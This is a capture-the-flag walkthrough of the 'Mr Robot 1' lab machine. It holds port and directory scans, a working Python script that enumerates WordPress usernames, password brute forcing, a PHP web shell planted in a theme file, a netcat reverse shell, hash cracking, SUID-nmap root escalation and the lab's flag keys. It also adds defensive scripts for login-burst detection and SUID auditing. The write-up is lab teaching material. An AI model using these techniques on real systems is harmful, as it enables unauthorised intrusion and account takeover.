Machine Information
- Mr Robot 1
- Author: Leon Johnson
Host discovery
- Target IP: 10.10.10.129
Information Gathering
Nmap time
nmap -p- -T4 10.10.10.129 -A -oA 10.10.10.129
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-01 13:49 +08
Nmap scan report for 10.10.10.129
Host is up (0.00046s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:2B:C3:02 (VMware)
Aggressive OS guesses: Linux 3.10 - 4.11 (98%), Linux 3.2 - 4.9 (94%), Linux 3.2 - 3.8 (93%), Linux 3.18 (93%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 3.16 (91%), Linux 3.16 - 4.6 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.46 ms 10.10.10.129
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.48 seconds
Exploiting Port 80
I started out by looking into their web application, and it looks fancy. Everything there was a blur to me, so I decided to go through it while scanning for directories.
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.129
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.129
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 213]
/.htaccess (Status: 403) [Size: 218]
/.htpasswd (Status: 403) [Size: 218]
/0 (Status: 301) [Size: 0] [--> http://10.10.10.129/0/]
/admin (Status: 301) [Size: 234] [--> http://10.10.10.129/admin/]
/atom (Status: 301) [Size: 0] [--> http://10.10.10.129/feed/atom/]
/audio (Status: 301) [Size: 234] [--> http://10.10.10.129/audio/]
/blog (Status: 301) [Size: 233] [--> http://10.10.10.129/blog/]
/css (Status: 301) [Size: 232] [--> http://10.10.10.129/css/]
/dashboard (Status: 302) [Size: 0] [--> http://10.10.10.129/wp-admin/]
/favicon.ico (Status: 200) [Size: 0]
/feed (Status: 301) [Size: 0] [--> http://10.10.10.129/feed/]
/images (Status: 301) [Size: 235] [--> http://10.10.10.129/images/]
/image (Status: 301) [Size: 0] [--> http://10.10.10.129/image/]
/Image (Status: 301) [Size: 0] [--> http://10.10.10.129/Image/]
/index.html (Status: 200) [Size: 1188]
/index.php (Status: 301) [Size: 0] [--> http://10.10.10.129/]
/intro (Status: 200) [Size: 516314]
/js (Status: 301) [Size: 231] [--> http://10.10.10.129/js/]
/license (Status: 200) [Size: 19930]
/login (Status: 302) [Size: 0] [--> http://10.10.10.129/wp-login.php]
/page1 (Status: 301) [Size: 0] [--> http://10.10.10.129/]
/phpmyadmin (Status: 403) [Size: 94]
/readme (Status: 200) [Size: 7334]
/rdf (Status: 301) [Size: 0] [--> http://10.10.10.129/feed/rdf/]
/robots (Status: 200) [Size: 41]
/robots.txt (Status: 200) [Size: 41]
/rss (Status: 301) [Size: 0] [--> http://10.10.10.129/feed/]
/rss2 (Status: 301) [Size: 0] [--> http://10.10.10.129/feed/]
/sitemap (Status: 200) [Size: 0]
/sitemap.xml (Status: 200) [Size: 0]
/video (Status: 301) [Size: 234] [--> http://10.10.10.129/video/]
/wp-admin (Status: 301) [Size: 237] [--> http://10.10.10.129/wp-admin/]
/wp-content (Status: 301) [Size: 239] [--> http://10.10.10.129/wp-content/]
/wp-config (Status: 200) [Size: 0]
/wp-includes (Status: 301) [Size: 240] [--> http://10.10.10.129/wp-includes/]
/wp-cron (Status: 200) [Size: 0]
/wp-links-opml (Status: 200) [Size: 228]
/wp-load (Status: 200) [Size: 0]
/wp-mail (Status: 403) [Size: 3018]
/wp-login (Status: 200) [Size: 2740]
/wp-settings (Status: 500) [Size: 0]
/wp-signup (Status: 302) [Size: 0] [--> http://10.10.10.129/wp-login.php?action=register]
/xmlrpc (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
There are a lot of directories for this web application. I then looked into some of the useful ones, such as robots.txt.
curl 10.10.10.129/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
curl 10.10.10.129/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
wget 10.10.10.129/fsocity.dic
--2024-02-01 14:02:01-- http://10.10.10.129/fsocity.dic
Connecting to 10.10.10.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic 100%[========================================================================================================================================>] 6.91M --.-KB/s in 0.1s
2024-02-01 14:02:02 (55.6 MB/s) - ‘fsocity.dic’ saved [7245381/7245381]
The robots.txt provided some useful information: one entry looks like a list of usernames or passwords, and the other is some random key. I then looked into the other directories related to WordPress.
On the login page, an error message is shown when I tried to log in. It says that the username is invalid, which means the application tells a wrong username apart from a wrong password. I then tried to brute-force the username to see if it's possible to get a valid one. I created a Python script to get the username.
import requests
from bs4 import BeautifulSoup

# URL and other constants
url = "http://10.10.10.129:80/wp-login.php"
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    # "br" dropped: requests only decodes brotli when the brotli package is installed,
    # and an undecoded body would never contain the error text we look for below
    "Accept-Encoding": "gzip, deflate",
    "Referer": "http://10.10.10.129/wp-login.php",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://10.10.10.129",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
}
cookies = {
    "s_cc": "true",
    "s_fid": "051823D33476B49E-28504DD2ABE3E333",
    "s_nr": "1706767146747",
    "s_sq": "%5B%5BB%5D%5D",
    "wordpress_test_cookie": "WP+Cookie+check",
}

# Open and read candidate usernames from the wordlist found via robots.txt
with open('fsocity.dic', 'r', errors='ignore') as file:
    for line in file:
        user = line.strip()  # Remove any trailing newline characters
        if not user:
            continue
        data = {
            "log": user,
            "pwd": "a",  # dummy password; only the error message matters
            "wp-submit": "Log In",
            "redirect_to": "http://10.10.10.129/wp-admin/",
            "testcookie": "1",
        }
        # Send the POST request
        response = requests.post(url, headers=headers, cookies=cookies, data=data, timeout=10)
        soup = BeautifulSoup(response.text, 'html.parser')  # built-in parser, no lxml needed
        login_error = soup.find('div', id='login_error')
        # WordPress answers "Invalid username." for unknown users and a different
        # message for a known user with a wrong password, which gives the name away
        if 'Invalid username.' not in str(login_error):
            print(f"User found: {user}")
            break
I managed to get a username.
python user-enum.py
User found: Elliot
I then tried to brute-force the password by modifying the script, but it took me a long time just to get the password. The username and password to log in are Elliot:ER28-0652.
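From the defender's side, the username enumeration and password brute force above leave a distinctive trace in the web server's access log: a burst of POST requests to wp-login.php from one client. As an added example that is not part of the original writeup, this Python script flags such bursts over a few constructed Apache combined-log lines; the IP addresses, timestamps and threshold are made up for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log line: client, identd, user, [time], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return (ip, epoch_seconds, method, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z").timestamp()
    return m.group("ip"), ts, m.group("method"), m.group("path").split("?")[0], int(m.group("status"))

def detect_login_bursts(lines, threshold=20, window=60):
    """Map each client IP to the most POST /wp-login.php requests it made within any
    `window`-second span, reporting only clients at or above `threshold`."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == "/wp-login.php":
            attempts[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        best = start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:  # slide the window's left edge
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged

# Constructed sample log (not taken from the writeup): one client posting to the
# login form once a second for 30 seconds, plus a legitimate user who logs in once.
LINE = '{ip} - - [01/Feb/2024:14:10:{sec:02d} +0800] "POST /wp-login.php HTTP/1.1" {status} 2740 "-" "Mozilla/5.0"'
SAMPLE_LINES = [LINE.format(ip="10.10.10.128", sec=s, status=200) for s in range(30)]
SAMPLE_LINES.append('10.10.10.50 - - [01/Feb/2024:14:10:05 +0800] "GET /blog/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"')
SAMPLE_LINES.append(LINE.format(ip="10.10.10.50", sec=45, status=302))

if __name__ == "__main__":
    for ip, count in detect_login_bursts(SAMPLE_LINES).items():
        print(f"{ip}: {count} login attempts within 60s")  # 10.10.10.128: 30 login attempts within 60s
```

The same sliding-window count works on a real access log by replacing SAMPLE_LINES with the file's lines; pair it with a login rate limit so the alert has a matching control.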
Since it is the WordPress admin dashboard, I looked around for a way to upload a PHP file. After searching around, I found a function where I could edit the PHP files of the theme. I then wrote my own simple RCE shell into one of them and tested it.
curl '10.10.10.129/wp-content/themes/twentyfifteen/404.php?a=id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Now that I have confirmed everything works, I spawned a reverse shell by uploading my malicious code into the 404.php.
nc -nvlp 7735
listening on [any] 7735 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.129] 41663
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
07:53:02 up 2:09, 0 users, load average: 0.00, 0.05, 0.41
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/$ export TERM=xterm
export TERM=xterm
daemon@linux:/$ ^Z
zsh: suspended nc -nvlp 7735
stty raw -echo;fg
Let's move on to privilege escalation.
Privilege Escalation
I tried looking around, especially in the /home directories, and found something.
daemon@linux:/home/robot$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
A password hash was given in /home/robot, which I assume should be the password hash of user robot. I managed to crack the hash with online tools and got the password: c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz. With that password, I instantly tried to log in as user robot.
daemon@linux:/home/robot$ su robot
Password:
robot@linux:~$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ sudo -l
[sudo] password for robot:
Sorry, user robot may not run sudo on linux.
robot@linux:~$
After logging in as user robot, I checked for sudo permissions but had no luck with that. I then searched for other things again.
robot@linux:~$ find / -perm -u=s 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
While searching for SUID binaries, I noticed nmap, which according to GTFOBins can be used to spawn a shell.
robot@linux:~$ nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> h
Nmap Interactive Commands:
n <nmap args> -- executes an nmap scan using the arguments given and
waits for nmap to finish. Results are printed to the
screen (of course you can still use file output commands).
! <command> -- runs shell command given in the foreground
x -- Exit Nmap
f [--spoof <fakeargs>] [--nmap_path <path>] <nmap args>
-- Executes nmap in the background (results are NOT
printed to the screen). You should generally specify a
file for results (with -oX, -oG, or -oN). If you specify
fakeargs with --spoof, Nmap will try to make those
appear in ps listings. If you wish to execute a special
version of Nmap, specify --nmap_path.
n -h -- Obtain help with Nmap syntax
h -- Prints this help screen.
Examples:
n -sS -O -v example.com/24
f --spoof "/usr/local/bin/pico -z hello.c" -sS -oN e.log example.com/24
nmap> !bash -p
bash-4.3# whoami
root
bash-4.3# cd /root
bash-4.3# ls -la
total 32
drwx------ 3 root root 4096 Nov 13 2015 .
drwxr-xr-x 22 root root 4096 Sep 16 2015 ..
-rw------- 1 root root 4058 Nov 14 2015 .bash_history
-rw-r--r-- 1 root root 3274 Sep 16 2015 .bashrc
drwx------ 2 root root 4096 Nov 13 2015 .cache
-rw-r--r-- 1 root root 0 Nov 13 2015 firstboot_done
-r-------- 1 root root 33 Nov 13 2015 key-3-of-3.txt
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw------- 1 root root 1024 Sep 16 2015 .rnd
bash-4.3# cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
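From the defender's side, the finding above (a setuid nmap in /usr/local/bin) is exactly what a routine SUID audit should catch. As an added example that is not part of the original writeup, this Python script compares the setuid files on a host against a baseline and flags anything outside package-managed paths; the baseline set and the prefix list are my assumptions for a stock Ubuntu 14.04 box, not values from the page.

```python
import os
import stat

# Assumed baseline for this example: the setuid programs a stock Ubuntu 14.04
# install ships with. A real audit would derive this from a known-good host or
# the package manager rather than hard-coding it.
BASELINE_SUID = {
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
}
# Package-managed software never lives under these prefixes, so a setuid file
# there (like the nmap in this writeup) is suspect even if someone baselined it.
NON_PACKAGE_PREFIXES = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/")

def audit_suid(paths, baseline=BASELINE_SUID):
    """Classify setuid paths (e.g. `find / -perm -u=s` output); return {path: reason}."""
    findings = {}
    for path in paths:
        path = path.strip()
        if not path:
            continue
        if path.startswith(NON_PACKAGE_PREFIXES):
            findings[path] = "setuid binary outside package-managed paths"
        elif path not in baseline:
            findings[path] = "setuid binary not in baseline"
    return findings

def live_suid_paths(root="/"):
    """Walk the filesystem and return every regular file with the setuid bit set."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(full)
    return found

if __name__ == "__main__":
    # Constructed sample: a subset of the find output shown in the writeup.
    sample = ["/bin/su", "/usr/bin/sudo", "/usr/local/bin/nmap",
              "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper"]
    for path, reason in audit_suid(sample).items():
        print(f"{path}: {reason}")
```

Running audit_suid(live_suid_paths()) as root on a schedule and diffing the result against the previous run turns this into a simple change-detection control.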
Things I learned from the machine
- Python scripts are hard to write without the help of ChatGPT
- WordPress can easily give a reverse shell if you are able to get into the admin dashboard